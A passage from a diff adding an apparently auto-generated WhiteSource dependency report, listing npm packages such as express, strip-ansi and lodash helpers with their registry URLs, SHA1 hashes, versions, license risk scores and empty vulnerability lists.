"vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "fdb30be6-ede3-4e8f-8a8d-402465cdeaa4", + "keyId": 26948638, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-3.0.1.tgz", + "homePage": "https://github.com/chalk/strip-ansi", + "genericPackageIndex": "https://www.npmjs.org/package/strip-ansi" + }, + "matchType": "SHA1", + "sha1": "6a385fb8853d952d5ff05d0e8aaf94278dc63dcf", + "name": "strip-ansi-3.0.1.tgz", + "artifactId": "strip-ansi-3.0.1.tgz", + "version": "3.0.1", + "groupId": "strip-ansi", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/strip-ansi" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "dbc2154f-7d62-4f1f-ab53-1f64c2f29b34", + "keyId": 26948394, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", + "homePage": "https://github.com/substack/typedarray", + "genericPackageIndex": "https://www.npmjs.org/package/typedarray" + }, + "matchType": "SHA1", + "sha1": "867ac74e3864187b1d3d47d996a78ec5c8830777", + "name": "typedarray-0.0.6.tgz", + "artifactId": "typedarray-0.0.6.tgz", + "version": "0.0.6", + "groupId": "typedarray", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/typedarray" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1b674472-af53-47ea-b2ab-5990657118e0", + "keyId": 26948171, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", + "homePage": "https://github.com/chalk/ansi-styles#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ansi-styles" + }, + "matchType": "SHA1", + "sha1": "41fbb20243e50b12be0f04b8dedbf07520ce841d", + "name": "ansi-styles-3.2.1.tgz", + "artifactId": "ansi-styles-3.2.1.tgz", + "version": "3.2.1", + "groupId": "ansi-styles", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ansi-styles" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e5420fed-c82b-4ae7-bad7-9af66e32ef7d", + "keyId": 27552693, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/express/-/express-4.17.1.tgz", + "homePage": "http://expressjs.com/", + "genericPackageIndex": "https://www.npmjs.org/package/express" + }, + "matchType": "SHA1", + "sha1": "4491fc38605cf51f8629d39c2b5d026f98a4c134", + "name": "express-4.17.1.tgz", + "artifactId": "express-4.17.1.tgz", + "version": "4.17.1", + "groupId": "express", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/afaf82cc-0988-4eb4-9d9c-abddfdb39cc6" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9d8029c2-178e-4a37-8757-1611b613cfbd", + "keyId": 26954808, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/registry-url/-/registry-url-3.1.0.tgz", + "homePage": "https://github.com/sindresorhus/registry-url", + "genericPackageIndex": "https://www.npmjs.org/package/registry-url" + }, + "matchType": "SHA1", + "sha1": "3d4ef870f73dde1d77f0cf9a381432444e174942", + "name": "registry-url-3.1.0.tgz", + "artifactId": "registry-url-3.1.0.tgz", + "version": "3.1.0", + "groupId": "registry-url", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/registry-url" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "41c04b1a-57d0-4eec-b5ac-1f4ce3783b67", + "keyId": 27225213, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.3.3.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-syntax-typescript" + }, + "matchType": "SHA1", + "sha1": "a7cc3f66119a9f7ebe2de5383cce193473d65991", + "name": "plugin-syntax-typescript-7.3.3.tgz", + "artifactId": "plugin-syntax-typescript-7.3.3.tgz", + "version": "7.3.3", + "groupId": "@babel/plugin-syntax-typescript", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-syntax-typescript" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "25ed7b54-f2e9-44bb-b8eb-ab639d0d2f74", + "keyId": 26958563, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.isplainobject/-/lodash.isplainobject-4.0.6.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.isplainobject" + }, + "matchType": "SHA1", + "sha1": "7c526a52d89b45c45cc690b88163be0497f550cb", + "name": "lodash.isplainobject-4.0.6.tgz", + "artifactId": "lodash.isplainobject-4.0.6.tgz", + "version": "4.0.6", + "groupId": "lodash.isplainobject", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/lodash.isplainobject" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e5cc5a6c-f3d1-41cf-86a8-2f742e6a4b14", + "keyId": 26955090, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/latest-version/-/latest-version-3.1.0.tgz", + "homePage": "https://github.com/sindresorhus/latest-version#readme", + "genericPackageIndex": "https://www.npmjs.org/package/latest-version" + }, + "matchType": "SHA1", + "sha1": "a205383fea322b33b5ae3b18abee0dc2f356ee15", + "name": "latest-version-3.1.0.tgz", + "artifactId": "latest-version-3.1.0.tgz", + "version": "3.1.0", + "groupId": "latest-version", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/01f7cceb-dfeb-4e5c-ba54-0b158f227c6b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "caa7c2e6-7608-4580-99d2-cd4cfe2d5059", + "keyId": 27480822, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/contentful-resolve-response/-/contentful-resolve-response-1.1.4.tgz", + "homePage": "https://github.com/contentful/contentful-resolve-response", + "genericPackageIndex": "https://www.npmjs.org/package/contentful-resolve-response" + }, + "matchType": "SHA1", + "sha1": "9eb656876eecb2cd00444f0adf26bd91a5ec1992", + "name": "contentful-resolve-response-1.1.4.tgz", + "artifactId": "contentful-resolve-response-1.1.4.tgz", + "version": "1.1.4", + "groupId": "contentful-resolve-response", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/contentful-resolve-response" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "721403ac-ecf8-4a04-b3b7-b492c9ba20f5", + "keyId": 27100353, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/babel-core/-/babel-core-7.0.0-bridge.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/babel-core" + }, + "matchType": "SHA1", + "sha1": "95a492ddd90f9b4e9a4a1da14eb335b87b634ece", + "name": "babel-core-7.0.0-bridge.0.tgz", + "artifactId": "babel-core-7.0.0-bridge.0.tgz", + "version": "7.0.0-bridge.0", + "groupId": "babel-core", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/babel-core/v/7.0.0-bridge.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f5784ed7-32d7-478b-8f87-7a0a20abc2e7", + "keyId": 26955708, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/destroy/-/destroy-1.0.4.tgz", + "homePage": "https://github.com/stream-utils/destroy", + "genericPackageIndex": "https://www.npmjs.org/package/destroy" + }, + "matchType": "SHA1", + "sha1": "978857442c44749e4206613e37946205826abd80", + "name": "destroy-1.0.4.tgz", + "artifactId": "destroy-1.0.4.tgz", + "version": "1.0.4", + "groupId": "destroy", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/1830950d-66ea-4e28-9e0b-39e2b2585cd9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f18cbe2a-dabc-4c28-8d05-6dcb2df9c530", + "keyId": 26955170, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/urix/-/urix-0.1.0.tgz", + "homePage": "https://github.com/lydell/urix", + "genericPackageIndex": "https://www.npmjs.org/package/urix" + }, + "matchType": "SHA1", + "sha1": "da937f7a62e21fec1fd18d49b35c2935067a6c72", + "name": "urix-0.1.0.tgz", + "artifactId": "urix-0.1.0.tgz", + "version": "0.1.0", + "groupId": "urix", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/49c0bdf6-8686-4f77-ab9d-082f07e5d05e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "16cff3d9-d6e7-44df-a582-1663a42d09d5", + "keyId": 27100445, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cssesc/-/cssesc-2.0.0.tgz", + "homePage": "https://mths.be/cssesc", + "genericPackageIndex": "https://www.npmjs.org/package/cssesc" + }, + "matchType": "SHA1", + "sha1": "3b13bd1bb1cb36e1bcb5a4dcd27f54c5dcb35703", + "name": "cssesc-2.0.0.tgz", + "artifactId": "cssesc-2.0.0.tgz", + "version": "2.0.0", + "groupId": "cssesc", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/cssesc/v/2.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "fe26bc3e-5ca5-412d-b32e-7aa4f0ea57ca", + "keyId": 26955427, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-installed-globally/-/is-installed-globally-0.1.0.tgz", + "homePage": "https://github.com/sindresorhus/is-installed-globally#readme", + "genericPackageIndex": "https://www.npmjs.org/package/is-installed-globally" + }, + "matchType": "SHA1", + "sha1": "0dfd98f5a9111716dd535dda6492f67bf3d25a80", + "name": "is-installed-globally-0.1.0.tgz", + "artifactId": "is-installed-globally-0.1.0.tgz", + "version": "0.1.0", + "groupId": "is-installed-globally", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/is-installed-globally/v/0.1.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "95471c9a-7841-4703-a22c-4efde921fa2b", + "keyId": 27088707, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.3.tgz", + "homePage": "https://github.com/jshttp/content-disposition#readme", + "genericPackageIndex": "https://www.npmjs.org/package/content-disposition" + }, + "matchType": "SHA1", + "sha1": "e130caf7e7279087c5616c2007d0485698984fbd", + "name": "content-disposition-0.5.3.tgz", + "artifactId": "content-disposition-0.5.3.tgz", + "version": "0.5.3", + "groupId": "content-disposition", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/content-disposition/v/0.5.3" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d13b4952-39c4-460e-b287-2b35b853d70f", + "keyId": 27029285, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/source-list-map/-/source-list-map-2.0.1.tgz", + "homePage": "https://github.com/webpack/source-list-map", + "genericPackageIndex": "https://www.npmjs.org/package/source-list-map" + }, + "matchType": "SHA1", + "sha1": "3993bd873bfc48479cca9ea3a547835c7c154b34", + "name": "source-list-map-2.0.1.tgz", + "artifactId": "source-list-map-2.0.1.tgz", + "version": "2.0.1", + "groupId": "source-list-map", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/source-list-map" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ce161ad9-22fa-4b6f-8788-17481efc9a35", + "keyId": 26954704, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/camelcase/-/camelcase-4.1.0.tgz", + "homePage": "https://github.com/sindresorhus/camelcase#readme", + "genericPackageIndex": "https://www.npmjs.org/package/camelcase" + }, + "matchType": "SHA1", + "sha1": "d545635be1e33c542649c69173e5de6acfae34dd", + "name": "camelcase-4.1.0.tgz", + "artifactId": "camelcase-4.1.0.tgz", + "version": "4.1.0", + "groupId": "camelcase", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/893b995d-fbad-424c-990b-b8a26f9686fc" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a993dcee-3536-4442-a3a6-513e4b3eeccc", + "keyId": 26948551, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ini/-/ini-1.3.5.tgz", + "homePage": "https://github.com/isaacs/ini#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ini" + }, + "matchType": "SHA1", + "sha1": "eee25f56db1c9ec6085e0c22778083f596abf927", + "name": "ini-1.3.5.tgz", + "artifactId": "ini-1.3.5.tgz", + "version": "1.3.5", + "groupId": "ini", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/0cb40bc6-8afb-42b4-8174-8869492025fe" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ab3a684b-0d95-4ca9-af3d-a1ce2fd9a21e", + "keyId": 27007656, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/stylis-rule-sheet/-/stylis-rule-sheet-0.0.10.tgz", + "homePage": "https://github.com/thysultan/stylis.js", + "genericPackageIndex": "https://www.npmjs.org/package/stylis-rule-sheet" + }, + "matchType": "SHA1", + "sha1": "44e64a2b076643f4b52e5ff71efc04d8c3c4a430", + "name": "stylis-rule-sheet-0.0.10.tgz", + "artifactId": "stylis-rule-sheet-0.0.10.tgz", + "version": "0.0.10", + "groupId": "stylis-rule-sheet", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/stylis-rule-sheet" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c0051829-b2f4-41b8-972d-cb5e51806f18", + "keyId": 26965479, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.isboolean/-/lodash.isboolean-3.0.3.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.isboolean" + }, + "matchType": "SHA1", + "sha1": "6c2e171db2a257cd96802fd43b01b20d5f5870f6", + "name": "lodash.isboolean-3.0.3.tgz", + "artifactId": "lodash.isboolean-3.0.3.tgz", + "version": "3.0.3", + "groupId": "lodash.isboolean", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/lodash.isboolean" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "446e8017-7d65-4508-a618-d54138821e5d", + "keyId": 26955352, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/punycode/-/punycode-1.3.2.tgz", + "homePage": "https://mths.be/punycode", + "genericPackageIndex": "https://www.npmjs.org/package/punycode" + }, + "matchType": "SHA1", + "sha1": "9653a036fb7c1ee42342f2325cceefea3926c48d", + "name": "punycode-1.3.2.tgz", + "artifactId": "punycode-1.3.2.tgz", + "version": "1.3.2", + "groupId": "punycode", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/punycode" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "72f154e7-0212-4ed5-8374-c4307bb0ffb0", + "keyId": 26965661, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/p-limit/-/p-limit-1.3.0.tgz", + "homePage": "https://github.com/sindresorhus/p-limit#readme", + "genericPackageIndex": "https://www.npmjs.org/package/p-limit" + }, + "matchType": "SHA1", + "sha1": "b86bd5f0c25690911c7590fcbfc2010d54b3ccb8", + "name": "p-limit-1.3.0.tgz", + "artifactId": "p-limit-1.3.0.tgz", + "version": "1.3.0", + "groupId": "p-limit", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c50e07bc-d095-4eb4-ba75-381a73216b88" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e518a165-07be-41a6-8af4-11e5d472bca3", + "keyId": 27557107, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/launch-editor/-/launch-editor-2.2.1.tgz", + "homePage": "https://github.com/yyx990803/launch-editor#readme", + "genericPackageIndex": "https://www.npmjs.org/package/launch-editor" + }, + "matchType": "SHA1", + "sha1": "871b5a3ee39d6680fcc26d37930b6eeda89db0ca", + "name": "launch-editor-2.2.1.tgz", + "artifactId": "launch-editor-2.2.1.tgz", + "version": "2.2.1", + "groupId": "launch-editor", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/launch-editor" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a9f3da3a-dbe9-4138-b553-35eec2323a31", + "keyId": 26948593, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/graceful-readlink/-/graceful-readlink-1.0.1.tgz", + "homePage": "https://github.com/zhiyelee/graceful-readlink", + "genericPackageIndex": "https://www.npmjs.org/package/graceful-readlink" + }, + "matchType": "SHA1", + "sha1": "4cafad76bc62f02fa039b2f94e9a3dd3a391a725", + "name": "graceful-readlink-1.0.1.tgz", + "artifactId": "graceful-readlink-1.0.1.tgz", + "version": "1.0.1", + "groupId": "graceful-readlink", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/9fd69109-6145-4204-ab08-17e537e8a787" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a3c5eb91-9079-45c1-95c9-5231b325e09a", + "keyId": 26955768, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", + "homePage": "https://github.com/mozilla/source-map", + "genericPackageIndex": "https://www.npmjs.org/package/source-map" + }, + "matchType": "SHA1", + "sha1": "74722af32e9614e9c287a8d0bbde48b5e2f1a263", + "name": "source-map-0.6.1.tgz", + "artifactId": "source-map-0.6.1.tgz", + "version": "0.6.1", + "groupId": "source-map", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/source-map" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "12c99c22-6113-44bd-89d3-6877da3aa164", + "keyId": 27075557, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", + "homePage": "https://mths.be/jsesc", + "genericPackageIndex": "https://www.npmjs.org/package/jsesc" + }, + "matchType": "SHA1", + "sha1": "80564d2e483dacf6e8ef209650a67df3f0c283a4", + "name": "jsesc-2.5.2.tgz", + "artifactId": "jsesc-2.5.2.tgz", + "version": "2.5.2", + "groupId": "jsesc", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5d2e70b5-8e9e-4de5-af15-aeef55d7006c" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "740aa3a8-f92f-4130-9d54-0f4a187c741c", + "keyId": 27523261, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/finalhandler/-/finalhandler-1.1.2.tgz", + "homePage": "https://github.com/pillarjs/finalhandler#readme", + "genericPackageIndex": "https://www.npmjs.org/package/finalhandler" + }, + "matchType": "SHA1", + "sha1": "b7e7d000ffd11938d0fdb053506f6ebabe9f587d", + "name": "finalhandler-1.1.2.tgz", + "artifactId": "finalhandler-1.1.2.tgz", + "version": "1.1.2", + "groupId": "finalhandler", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/finalhandler/v/1.1.2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "dd5695fd-4760-45fc-afd3-d128a613131b", + "keyId": 26948174, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", + "homePage": "https://github.com/dfcreative/color-name", + "genericPackageIndex": "https://www.npmjs.org/package/color-name" + }, + "matchType": "SHA1", + "sha1": "a7d0558bd89c42f795dd42328f740831ca53bc25", + "name": "color-name-1.1.3.tgz", + "artifactId": "color-name-1.1.3.tgz", + "version": "1.1.3", + "groupId": "color-name", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b4961464-3bd4-48fc-9efc-583fe6e15333" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "672c5379-2a00-4a11-96a5-763bf8cb5dda", + "keyId": 26954795, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/vary/-/vary-1.1.2.tgz", + "homePage": "https://github.com/jshttp/vary#readme", + "genericPackageIndex": "https://www.npmjs.org/package/vary" + }, + "matchType": "SHA1", + "sha1": "2299f02c6ded30d4a5961b0b9f74524a18f634fc", + "name": "vary-1.1.2.tgz", + "artifactId": "vary-1.1.2.tgz", + "version": "1.1.2", + "groupId": "vary", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/vary/v/1.1.2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d6db608e-f283-499e-aa45-6db231a4aaca", + "keyId": 27509157, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": 